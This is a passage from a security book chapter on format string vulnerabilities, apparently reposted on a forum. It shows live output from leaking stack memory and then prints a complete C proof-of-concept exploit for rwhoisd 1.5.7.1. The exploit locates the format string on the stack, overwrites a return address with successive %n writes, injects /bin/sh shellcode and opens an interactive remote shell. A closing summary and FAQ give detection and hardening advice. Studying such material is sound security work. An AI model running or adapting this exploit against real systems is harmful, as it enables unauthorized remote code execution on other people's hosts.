In cases such as this, where a program outputs a formatted string, it is possible
to read the contents of the stack to aid in successful exploitation. Complete
words of memory can be retrieved in the following manner:
[dma@victim server]$ nc localhost 4321
%rwhois V-1.5:003fff:00 victim (by Network Solutions, Inc. V-1.5.7.1)
-soa %010p
%error 340 Invalid Authority Area: 0xbffff935
-soa %010p%010p
%error 340 Invalid Authority Area: 0xbffff9350x0807fa80
www.syngress.com
342 Chapter 9 &iexcl;E Format Strings
-soa %010p%010p%010p
%error 340 Invalid Authority Area: 0xbffff9350x0807fa800x00000001
-soa %010p%010p%010p%010p
%error 340 Invalid Authority Area: 0xbffff9350x0807fa800x
000000010x08081cd8
In this example, the client retrieved one, two, three, and four words from the
stack.They have been formatted in a way that can be parsed automatically by an
exploit.A well-written exploit can use this output to reconstruct the stack layout
in the server process.The exploit can read memory from the stack until the
format string itself is located, and then calculate automatically the location where
the %n writes should begin in the format string.
%rwhois V-1.5:003fff:00 victim (by Network Solutions, Inc. V-1.5.7.1)
-soa %010p%010p%010p%010p%010p%010p%010p%010p%010p%010p%010p%010p%010p
%010p%010p%010p%010p%010p%010p%010p%010p%010p%010p%010p%010p%c%c%c%c%c
%error 340 Invalid Authority Area: 0xbffff9350x0807fa800x000000010x0807
fc300xbffff8f40x0804f21e0xbffff9350xbffff9350xbffff90c0x0804a6a30xbffff9
35(nil)0xbffff9300xbffffb640xbffff9200x0804eca10xbffff9300xbffff9300x000
000040xbffffb300x0804ef4e0xbffff9300x000000050x616f732d0x31302500010%p
In this example, the client has caused the printf function to search the stack
for variables where the format string is stored.The 010%p characters (in bold) are
the beginning of the client-supplied string, containing the very format specifiers
being processed. If the attacker were to embed an address in their format string at
the beginning of their string, and use a %n token where the %c specifiers are, the
address in the format string would be the one written to.
www.syngress.com
More Stack with Less Format String
It may be the case that the format string in the stack cannot be reached
by the printf function when it is reading in variables. This may occur for
several reasons, one of which is truncation of the format string. If the
format string is truncated to a maximum length at some point in the
Tools & Traps&iexcl;K
Continued
Format Strings &iexcl;E Chapter 9 343
www.syngress.com
program&iexcl;&brvbar;s execution before it is sent to the printf function, the number
of format specifiers that can be used is limited. There are a few ways to
get past this obstacle when writing an exploit.
The idea behind getting past this hurdle and reaching the
embedded address is to have the printf function read more memory
with less format string. There are a number of ways to accomplish this:
 Using Larger Data Types The first and most obvious method
is to use format specifiers associated with larger datatypes,
one of which is %lli, corresponding to the long long integer
type. On 32-bit Intel architecture, a printf function will read 8
bytes from the stack for every instance of this format speci-
fier embedded in a format string. It is also possible to use
long float and double long float format specifiers, though
the stack data may cause floating point operations to fail,
resulting in the process crashing.
 Using Output Length Arguments Some versions of libc support
the * token in format specifiers. This token tells the
printf function to obtain the number of characters that will
be output for this specifier from the stack as a function argument.
For each *, the function will eat another 4 bytes. The
output value read from the stack can be overridden by
including a number next to the actual format specifier. For
example:
The format specifier %*******10i will result in an integer
represented using 10 characters. Despite this, the printf
function will eat 32 bytes when it encounters this format
specifier.
The first use of this method is credited to an individual
known as lorian.
 Accessing Arguments Directly It is also possible to have the
printf function reference specific parameters directly. This can
be accomplished by using format specifiers in the form
%$xn, where x is the number of the argument (in order). This
technique is possible only on platforms with C libraries that
support access of arguments directly.
Having exhausted these tricks and still not able to reach an address
in the format string, the attacker should examine the process to determine
if there is anywhere else in a reachable region of the stack where
addresses can be placed. Remember that it is not required that the
Continued
344 Chapter 9 &iexcl;E Format Strings
Writing a Format String Exploit
Now we move on to actually exploiting a format string vulnerability.The goal of
the attacker, in the case of a program such as rwhoisd, is to force it to execute
instructions that are attacker-supplied.These instructions should grant access to
the attacker on the underlying host.
The exploit will be written for rwhoisd version 1.5.7.1, compiled on an i386
Linux system.This is the program we looked at earlier. As previously mentioned,
to execute shellcode, the exploit must overwrite a value that is referenced by the
process at some point as the address of instructions to be executed. In the exploit
we are developing, we will be overwriting a function return address with a
pointer to shellcode.The shellcode will exec() /bin/sh and provide shell access
to the client.
The first thing that the exploit code must do is connect to the service and
attempt to locate the format string in the stack.The exploit code does this by
connecting to the service and supplying format strings that incrementally return
words from the stack to the exploit.The function in the exploit that does this is
called brute_ force().This function sends format string specifiers that cause
increasing amounts of stack memory to be output by the server.The exploit then
compares each word in the stack output to 0x6262626262, which was placed at
the beginning of the format string.There is a chance that the alignment may be
off; this exploit does not take that possibility into account.
if((*ptr == '0') && (*(ptr+1) == 'x'))
{
memcpy(segment,ptr,10);
segment[10] = '\0';
chekit = strtoul(segment,NULL,16);
if(chekit == FINDME)
www.syngress.com
address be embedded in the format string, just that it is convenient
since it is often near in the stack. Data supplied by the attacker as input
other than the format string may be reachable. In the Screen vulnerability,
it was possible to access a variable that was constructed using the
HOME environment variable. This string was closer in the stack to anything
else externally supplied and could barely be reached.
Format Strings &iexcl;E Chapter 9 345
{
printf("*b00m*: found address #1: %i words away.\n",i);
foundit = i;
return foundit;
}
ptr += 10;
}
The stack output is parsed easily by the exploit due to the use of the %010p
format specifier by the exploit.The %010p formats each word as an 8-character
hex representation preceded by 0x. Each of these string representations of words
can be passed to a C library function such as strtoul and returned as a binary
(unsigned with strtoul()) integer data type.
The goal of this exploit is to execute arbitrary code.To do this, we must overwrite
some value that will be used to reference instructions to be executed. One
such value that can be overwritten is a function return address. As discussed earlier,
stack based buffer overflows usually overwrite these values because the return
address happens to exist on the stack and gets overwritten in an overflow condition.
We will replace a function return address simply because it&iexcl;&brvbar;s convenient.
Our goal is to overwrite the return address stored when print_error() is called.
In the binary version used to write this proof of concept, the address of this
return address on the stack when we can overwrite it is 0xbffff8c8.This address
will serve as our target.
Once the exploit has located the format string in the stack, it must construct
a new format string with the %n specifiers at the right position for the supplied
addresses to be used when writing.This can be accomplished by using format
specifiers such as %x to eat as many words of the stack as are required.This
exploit does this automatically based on the results of the brute_ force() function.
for(i = 0;i<num-1;i++)
{
strncat(str,"%x",2); // work our way to where target is
}
The num variable in the code listed originates from the brute force location
of the format string. Now that the exploit has an address to write to, we must
construct an address at the target location.
www.syngress.com
346 Chapter 9 &iexcl;E Format Strings
The return address must be overwritten using the successive writes we discussed
earlier. In order to construct a 4-byte address, the four writes must occur
at different offsets from the start of the word.The addresses must also be placed in
the format string:
*((long *)(str+8)) = TARGET; // target
*((long *)(str+16)) = TARGET+1;
*((long *)(str+24)) = TARGET+2;
*((long *)(str+32)) = TARGET+3;
str[36] = '\0';
The next step is to write the correct value at each of the offsets.The value
we are writing is the location of shellcode that we have placed in the stack.The
address for this example proof of concept is 0xbffff99d.
To construct this value, we must write the following low-order bytes to each
address in our format string:
TARGET - 9d
TARGET+1 - fn
TARGET+2 - ff
TARGET+3 - bf
This can be accomplished by using the padded format specifiers we discussed
earlier to write the desired low-order bits.
For example, writing %125x might cause the value 0x0000019d to be
written to TARGET.That&iexcl;&brvbar;s perfect for our situation because 9d will be the value
of the byte we want to write. By using padded format specifiers and successive
writes, we can construct the address we want at the target location:
strncat(str,"%227x",5); // padding
strncat(str,"%n",2); // first write
strncat(str,"%92x",4); // padding
strncat(str,"%n",2); // second write
strncat(str,"%262x",5); // padding
strncat(str,"%n",2); // third write
strncat(str,"%192x",5); // padding
strncat(str,"%n",2); // fourth write
It should be noted that the padding value used is highly dependent on the
total number of characters being output in the formatted string. It is possible to
www.syngress.com
Format Strings &iexcl;E Chapter 9 347
determine how many characters to pad automatically if the formatted string is
output.
Once the function return address is overwritten, vfprintf() will return normally
and the shellcode will be executed once print_error() returns. Figure 9.2 demonstrates
successful exploitation of this vulnerability.
The exploit code follows:
// proof of concept
// written for rwhoisd 1.5.7.1 compiled on a Linux/i386 system
//
// overwrites return address at 0xbffff8c8 and replaces it with
// address of shellcode (for this binary)
// the shellcode is based on that which was included
// in an exploit written by 'CowPower'.
// http://www.securityfocus.com/archive/1/222756
#include <stdio.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/socket.h>
www.syngress.com
Figure 9.2 Exploitation of the rwhoisd Format String Vulnerability to
Penetrate a Host
348 Chapter 9 &iexcl;E Format Strings
#include <sys/errno.h>
#include <linux/in.h>
extern int errno;
#define FINDME 0x62626262 // we need to find this in the stack
#define TARGET 0xbffff8c8 // the address that we are overwriting
void gen_str(char *str, int found,int target);
unsigned int brute_force(int s, char *str,char *reply);
void session(int s);
int main(int argc, char *argv[])
{
int s;
fd_set fd;
int amt;
struct sockaddr_in sa;
struct sockaddr_in ca;
int where = 0;
char reply[5000]; // receive buffer
char str[1000]; // send buffer
str[0] = '-'; // - directive prefix
str[1] = 's';
str[2] = 'o';
str[3] = 'a';
str[4] = ' '; // padding
str[5] = ' '; // padding
str[6] = ' '; // padding
www.syngress.com
Format Strings &iexcl;E Chapter 9 349
str[7] = ' '; // padding
*((long *)(str+8)) = FINDME; // find me in the stack
str[12] = '\0';
bzero(&ca,sizeof(struct sockaddr_in));
bzero(&sa,sizeof(struct sockaddr_in));
if ((s = socket(AF_INET, SOCK_STREAM, 0)) < 0)
{
perror("socket:");
}
if (bind(s,&ca,sizeof(struct sockaddr_in)) < 0)
{
perror("bind:");
}
sa.sin_addr.s_addr = inet_addr("127.0.0.1");
sa.sin_port = htons(4321);
sa.sin_family = AF_INET;
if (connect(s,&sa,sizeof(struct sockaddr_in)) < 0)
{
perror("connect");
}
where = brute_force(s,reply,str); // brute force
gen_str(str,where,TARGET); // generate exploit string
write(s,str,strlen(str)); // send exploit code
while(1)
{
amt = read(s,reply,1);
www.syngress.com
350 Chapter 9 &iexcl;E Format Strings
if (reply[0] == '\n')
break;
}
write(s,"id;\n",4);
amt = read(s,reply,1024);
reply[amt] = '\0';
if ((reply[0] == 'u') && (reply[1] == 'i') && (reply[2] == 'd'))
{
printf("*b00m*: %s\n",reply);
session(s);
}
else
{
printf("exploit attempt unsuccessful..\n");
}
close(s);
exit(0);
}
unsigned int brute_force(int s,char *reply, char *str)
{
// this function searches the stack on the victim host
// for the format string
int foundit = 0;
int amt = 0;
int i = 0;
amt = read(s,reply,500); // read in the header, junk
reply[amt] = '\0';
www.syngress.com
Format Strings &iexcl;E Chapter 9 351
while(!foundit)
{
strncat(str,"%010p",5);
write(s,str,strlen(str)+1);
write(s,"\n",1);
amt = read(s,reply,1024);
if (amt == 0)
{
fprintf(stderr,"Connection closed.\n");
close(s);
exit(-1);
}
reply[amt] = '\0';
amt = 0;
i = 0;
while(reply[amt-1] != '\n')
{
i += amt;
amt = read(s, reply+i, 1024);
if (amt == 0)
{
fprintf(stderr,"Connection closed.\n");
close(s);
exit(-1);
}
}
reply[amt] = '\0';
foundit = find_addr(reply);
}
www.syngress.com
352 Chapter 9 &iexcl;E Format Strings
}
int find_addr(char *str)
{
// this function parses server output.
// searches in words from the stack for
// the format string
char *ptr;
char segment[11];
unsigned long chekit = 0;
int i = 0;
int foundit = 0;
ptr = str + 6;
while((*ptr != '\0') && (*ptr != '\n'))
{
if((*ptr == '0') && (*(ptr+1) == 'x'))
{
memcpy(segment,ptr,10);
segment[10] = '\0';
chekit = strtoul(segment,NULL,16);
if(chekit == FINDME)
{
printf("*b00m*: found address #1: %i words away.\n",i);
foundit = i;
return foundit;
}
ptr += 10;
}
else if ((*ptr == ' ') && (*(ptr+1) == ' '))
www.syngress.com
Format Strings &iexcl;E Chapter 9 353
{
ptr += 10; // 0x00000000
}
i++;
}
return foundit;
}
void gen_str(char *str,int num,int target)
{
// this function generates the exploit string
// it contains the addresses to write to,
// the format specifiers (padding, %n's)
// and the shellcode
int i;
char *shellcode =
"\x90\x31\xdb\x89\xc3\x43\x89\xcb\x41\xb0\x3f\xcd\x80\xeb\x25\x5e"
"\x89\xf3\x83\xc3\xe0\x89\x73\x28\x31\xc0\x88\x43\x27\x89\x43\x2c"
"\x83\xe8\xf5\x8d\x4b\x28\x8d\x53\x2c\x89\xf3\xcd\x80\x31\xdb"
"\x31\xc0\x40\xcd\x80\xe8\xd6\xff\xff\xff/bin/sh";
memset(str+8,0x41,992); // clean the buffer
*((long *)(str+8)) = TARGET; // place the addresses
*((long *)(str+16)) = TARGET+1; // in the buffer
*((long *)(str+24)) = TARGET+2;
*((long *)(str+32)) = TARGET+3;
*((long *)(str+36)) = TARGET+4;
str[36] = '\0';
for(i = 0;i<num-1;i++)
{
www.syngress.com
354 Chapter 9 &iexcl;E Format Strings
strncat(str,"%x",2); // work our way to where target is
}
// the following section is binary dependent
strncat(str,"%227x",5); // padding
strncat(str,"%n",2); // first write
strncat(str,"%92x",4); // padding
strncat(str,"%n",2); // second write
strncat(str,"%262x",5); // padding
strncat(str,"%n",2); // third write
strncat(str,"%192x",5); // padding
strncat(str,"%n",2); // fourth write
strncat(str,shellcode,strlen(shellcode)); // insert the shellcode
strncat(str,"\n",1); // terminate with a newline
}
void session(int s)
{
// this function facilitates communication with a
// shell exec()'d on the victim host.
fd_set fds;
int i;
char buf[1024];
FD_ZERO(&fds);
while(1)
{
FD_SET(s, &fds);
FD_SET(0, &fds);
www.syngress.com
Format Strings &iexcl;E Chapter 9 355
select(s+1, &fds, NULL, NULL, NULL);
if (FD_ISSET(0,&fds))
{
i = 0;
bzero(buf,sizeof(buf));
fgets(buf,sizeof(buf)-2, stdin);
write(s,buf,strlen(buf));
}
else
if (FD_ISSET(s,&fds))
{
i = 0;
bzero(buf,sizeof(buf));
if ((i = read(s,buf,1024)) == 0)
{
printf("connection lost.\n");
exit(0);
}
buf[i] = '\0';
printf("%s",buf);
}
}
}
www.syngress.com
356 Chapter 9 &iexcl;E Format Strings
Summary
Format string vulnerabilities are one of the newest additions to the typical
hacker&iexcl;&brvbar;s bag of tricks.
Techniques hackers are using to exploit bugs in software have become signifi-
cantly more sophisticated in the past couple of years. One of the reasons for this
is that there are simply more hackers, more eyes pouring over and scrutinizing
source code. It&iexcl;&brvbar;s much easier to obtain information about how vulnerabilities and
weaknesses can be exploited and how systems function.
In general, hackers have woken up to the different consequences that programmatic
flaws can have. Printf functions, and bugs due to misuse of them, have
been around for years&iexcl;Xbut it was never even conceived by anyone that they
could be exploited to force execution of shellcode until recently. In addition to
format string bugs, new techniques have emerged such as overwriting malloc
structs; relying on free() to overwrite pointers, and signed integer index errors.
Hackers are more aware of what to look for, and how subtle bugs in software
can be exploited. Hackers are now peering into every program, observing
behavior in response to every possible kind of input. It is now more important
than ever for programmers to be conscious that many kinds of bugs thought to
be harmless can have disastrous consequences if left unfixed. System administrators
and users should be aware that exploitable bugs never considered critical may
lie latent in software they use.
Solutions Fast Track
Understanding Format String Vulnerabilities
Format string vulnerabilities are due to programmers allowing externally
supplied data in printf() function format string variable.
Format string vulnerabilities can allow for an attacker to read and write
to memory.
Format string vulnerabilities can lead to the execution of arbitrary code
through overwriting of return addresses, GOT entries, function pointers,
and so on.
www.syngress.com
Format Strings &iexcl;E Chapter 9 357
Examining a Vulnerable Program
Vulnerable programs typically have printf() calls with variables passed as
the format string argument.
Wrappers for printf() functions often lead to programmers forgetting that
a function accepts format strings and variable arguments.
Misuse of the syslog() function is responsible for a large number of
format string vulnerabilities, many of them high-profile.
Testing with a Random Format String
Programs can be tested for format string vulnerabilities by observing
behavior when format specifiers are supplied in various input.
Supplying %s, %x, %p, and other format specifiers can be used to determine
a format string vulnerability if data from memory is output in place
of them.You can&iexcl;&brvbar;t always tell immediately that there is a format string
vulnerability if the results are not being output.
Observing a process crash due to %n or %s format specifiers supplied as
input indicates that there is a format string vulnerability.
Writing a Format String Exploit
Format string exploits can be written that read memory or write
specific values to memory. Format string vulnerabilities are not
necessarily platform dependent. It is possible to exploit programs such as
Screen without relying on architecture and OS-dependent shellcode.
In format string vulnerabilities where the formatted string is output to
the attacker, memory can be read to aid in exploitation. Exploits can
reconstruct the process stack and automatically determine where to
place %n specifiers.
Format string vulnerabilities can use successive writes to overwrite
targets in memory with arbitrary values.This technique can be used to
write a custom value to almost any location in memory.
On platforms where unaligned writes are not permitted (such as RISC),
the %hn format specifier can be used to write short values on 2-byte
boundaries.
www.syngress.com
358 Chapter 9 &iexcl;E Format Strings
Q: Can nonexecutable stack configurations or stack protection schemes such as
StackGuard protect against format string exploits?
A: Unfortunately, no. Format string vulnerabilities allow for an attacker to write
to almost any location in memory. StackGuard protects the integrity of stack
frames, while nonexecutable stack configurations do not allow instructions in
the stack to be executed. Format string vulnerabilities allow for both of these
protections to be evaded. Hackers can replace values used to reference
instructions other than function return addresses to avoid StackGuard, and
can place shellcode in areas such as the heap. Although protections such as
nonexecutable stack configurations and StackGuard may stop some publicly
available exploits, determined and skilled hackers can usually get around
them.
Q: Are format string vulnerabilities UNIX specific?
A: No. Format string vulnerabilities are common in UNIX systems because of
the more frequent use of the printf functions. Misuse of the syslog interface
also contributes to many of the UNIX specific format string vulnerabilities.
The exploitability of these bugs (involving writing to memory) depends on
whether the C library implementation of printf supports %n. If it does, any
program linked to it with a format string bug can theoretically be exploited
to execute arbitrary code.
Q: How can I find format string vulnerabilities?
A: Many format string vulnerabilities can easily be picked out in source code. In
addition, they can often be detected automatically by examining the arguments
passed to printf() functions.Any printf() family call that has only a single argument
is an obvious candidate, if the data being passed is externally supplied.
www.syngress.com
Frequently Asked Questions
The following Frequently Asked Questions, answered by the authors of this book,
are designed to both measure your understanding of the concepts presented in
this chapter and to assist you with real-life implementation of these concepts. To
have your questions about this chapter answered by the author, browse to
www.syngress.com/solutions and click on the &iexcl;§Ask the Author&iexcl;&uml; form.
Format Strings &iexcl;E Chapter 9 359
Q: How can I eliminate or minimize the risk of unknown format string vulnerabilities
in programs on my system?
A: A good start is having a sane security policy. Rely on the least-privileges
model, ensure that only the most necessary utilities are installed setuid and
can be run only by members of a trusted group. Disable or block access to all
services that are not completely necessary.
Q: What are some signs that someone may be trying to exploit a format string
vulnerability?
A: This question is relevant because many format string vulnerabilities are due to
bad use of the syslog() function.When a format string vulnerability due to
syslog() is exploited, the formatted string is output to the log stream.An
administrator monitoring the syslog logs can identify format string exploitation
attempts by the presence of strange looking syslog messages. Some other
more general signs are if daemons disappear or crash regularly due to access
violations.
Q: Where can I learn more about finding and exploiting format string
vulnerabilities?
A: There are a number of excellent papers on the subject.Tim Newsham
authored a whitepaper published by Guardent which can be found at
www.securityfocus.com/archive/1/81565. Papers written by TESO
(www.team-teso.net/articles/formatstring) and HERT
(www.hert.org/papers/format.html) are also recommended.
mic64 目前離線  
送花文章: 0, 收花文章: 16 篇, 收花: 56 次